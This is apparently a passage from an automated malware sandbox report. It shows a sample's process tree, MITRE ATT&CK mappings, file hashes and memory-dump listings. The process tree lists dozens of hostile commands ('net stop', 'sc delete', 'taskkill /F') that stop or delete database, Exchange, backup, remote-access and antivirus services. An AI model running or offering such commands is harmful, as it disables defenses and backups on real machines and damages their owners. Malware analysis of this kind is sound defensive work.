- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop MSExchangeDelivery
  2⤵
  PID:2908

C:\Windows\SysWOW64\net.exe
net stop TeamViewer
1⤵
- Discovers systems in the same network
PID:2360
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop TeamViewer
  2⤵
  PID:2904

C:\Windows\SysWOW64\sc.exe
sc delete eCardMPService
1⤵
PID:1472

C:\Windows\SysWOW64\sc.exe
sc delete c2wts
1⤵
PID:2860

C:\Windows\SysWOW64\sc.exe
sc delete MsDtsServer100
1⤵
PID:3012

C:\Windows\SysWOW64\sc.exe
sc delete secbizsrv
1⤵
- Launches sc.exe
PID:2948

C:\Windows\SysWOW64\sc.exe
sc delete MSCRMAsyncService
1⤵
- Launches sc.exe
PID:768

C:\Windows\SysWOW64\net.exe
net stop RapidRecoveryAgent
1⤵
PID:2804
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop RapidRecoveryAgent
  2⤵
  PID:2940

C:\Windows\SysWOW64\sc.exe
sc delete AppFabricCachingService
1⤵
PID:2872

C:\Windows\SysWOW64\sc.exe
sc delete KuaiYunTools
1⤵
PID:2200

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1TNSListener
1⤵
PID:1684

C:\Windows\SysWOW64\sc.exe
sc delete SQLTELEMETRY
1⤵
PID:2808

C:\Windows\SysWOW64\net.exe
net stop MSExchangeDiagnostics
1⤵
PID:1384
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop MSExchangeDiagnostics
  2⤵
  PID:2324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQLBrowser"
1⤵
PID:468

C:\Windows\SysWOW64\sc.exe
sc delete "UWS LoPriv Services"
1⤵
PID:1400

C:\Windows\SysWOW64\sc.exe
sc delete ADWS
1⤵
- Launches sc.exe
PID:1216

C:\Windows\SysWOW64\sc.exe
sc delete MSMQ
1⤵
- Launches sc.exe
PID:2348

C:\Windows\SysWOW64\sc.exe
sc delete KMSELDI
1⤵
- Launches sc.exe
PID:1004

C:\Windows\SysWOW64\sc.exe
sc delete SQLSERVERAGENT
1⤵
PID:1764

C:\Windows\SysWOW64\net.exe
net stop FirebirdServerDefaultInstance
1⤵
PID:1644
- C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
  2⤵
  PID:2232

C:\Windows\SysWOW64\sc.exe
sc delete smtpsvrJT
1⤵
PID:3068

C:\Windows\SysWOW64\sc.exe
sc delete "eCard-TTransServer"
1⤵
- Launches sc.exe
PID:1956

C:\Windows\SysWOW64\sc.exe
sc delete MotionBoard57
1⤵
PID:3008

C:\Windows\SysWOW64\sc.exe
sc delete btPanel
1⤵
PID:2528

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1ClrAgent
1⤵
- Launches sc.exe
PID:1904

C:\Windows\SysWOW64\sc.exe
sc delete MotionBoardRCService57
1⤵
- Launches sc.exe
PID:2728

C:\Windows\SysWOW64\sc.exe
sc delete zyb_sync
1⤵
- Launches sc.exe
PID:2856

C:\Windows\SysWOW64\sc.exe
sc delete "DAService_TCP"
1⤵
PID:1484
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /IM CCenter.exe /F
  2⤵
  - Kills process with taskkill
  PID:268
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /IM ScanFrm.exe /F
  2⤵
  - Kills process with taskkill
  PID:2620
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /IM d_manage.exe /F
  2⤵
  - Kills process with taskkill
  PID:2488

C:\Windows\SysWOW64\sc.exe
sc delete "XT800Service_Personal"
1⤵
- Launches sc.exe
PID:296

C:\Windows\SysWOW64\sc.exe
sc delete Protect_2345Explorer
1⤵
- Launches sc.exe
PID:2680

C:\Windows\SysWOW64\sc.exe
sc delete 360EntHttpServer
1⤵
- Launches sc.exe
PID:2616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$
1⤵
PID:1908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9"
1⤵
PID:432

C:\Windows\SysWOW64\sc.exe
sc delete 2345PicSvc
1⤵
PID:2220

C:\Windows\SysWOW64\sc.exe
sc delete 360EntSvc
1⤵
PID:2544

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Lscoqaqhparnrkbhgfowpkiller.bat

Filesize
39KB

MD5
0e115cd39c3c92a0c3736555c022c7f3

SHA1
3fa79012dfdac626a19017ed6974316df13bc6ff

SHA256
22816dc4dda6beec453e9a48520842b8409c54933cc81f1a338bc77199ab917e

SHA512
034e1286dff6cf653a69b2f46b04e45c47e8c2c4e7be6af0af4259d71ffd2967f6e24b722cb58a618419ac2ba25ca5e4d3d833e9147ad01c8064b17ab0e14318

Download Submit
memory/468-60-0x000000006E8A0000-0x000000006EE4B000-memory.dmp

Filesize
5.7MB

Download
memory/468-61-0x000000006E8A0000-0x000000006EE4B000-memory.dmp

Filesize
5.7MB

Download
memory/468-62-0x000000006E8A0000-0x000000006EE4B000-memory.dmp

Filesize
5.7MB

Download
memory/1292-56-0x0000000005220000-0x00000000052CA000-memory.dmp

Filesize
680KB

Download
memory/1292-57-0x00000000053E0000-0x0000000005472000-memory.dmp

Filesize
584KB

Download
memory/1292-54-0x0000000000950000-0x000000000095A000-memory.dmp

Filesize
40KB

Download
memory/1292-55-0x0000000075881000-0x0000000075883000-memory.dmp

Filesize
8KB

Download
memory/2212-128-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2212-134-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2212-136-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2212-130-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2212-133-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2212-127-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/2212-132-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download